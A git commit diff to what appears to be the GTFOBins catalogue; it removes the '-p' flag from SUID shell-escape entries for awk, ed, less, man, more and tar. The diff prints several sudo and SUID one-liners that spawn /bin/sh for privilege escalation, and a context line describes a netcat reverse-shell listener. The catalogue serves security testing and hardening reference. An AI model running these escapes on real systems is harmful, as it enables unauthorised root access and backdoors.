Remove the -p option from suid-limited

It is useless because: - if Debian-like, it is not supported and does not drop anyway; - otherwise the `system()`-like function already used a shell that dropped the privileges.
2025-11-04 02:38:43 +01:00 · 2018-05-25 00:57:42 +02:00
parent 84f48081fb
commit e885d4a6ee
7 changed files with 12 additions and 12 deletions
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -12,7 +12,7 @@ suid-enabled:

 suid-limited:
  label: Limited SUID
-  description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems (if that's the case don't use the `-p` option).
+  description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems.

 sudo-enabled:
  label: Sudo
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -5,7 +5,7 @@ functions:
  sudo-enabled:
    - code: sudo awk 'BEGIN {system("/bin/sh")}'
  suid-limited:
-    - code: ./awk 'BEGIN {system("/bin/sh -p")}'
+    - code: ./awk 'BEGIN {system("/bin/sh")}'
  reverse-shell-non-interactive:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -11,5 +11,5 @@ functions:
  suid-limited:
    - code: |-
        ./ed
-        !/bin/sh -p
---
+        !/bin/sh
+---
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -14,5 +14,5 @@ functions:
  suid-limited:
    - code: |-
        ./less /etc/profile
-        !/bin/sh -p
---
+        !/bin/sh
+---
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -11,5 +11,5 @@ functions:
  suid-limited:
    - code: |-
        ./man man
-        !/bin/sh -p
---
+        !/bin/sh
+---
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -11,5 +11,5 @@ functions:
  suid-limited:
    - code: |-
        TERM= ./more /etc/profile
-        !/bin/sh -p
---
+        !/bin/sh
+---
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -5,5 +5,5 @@ functions:
  sudo-enabled:
    - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
  suid-limited:
-    - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"
---
+    - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh"
+---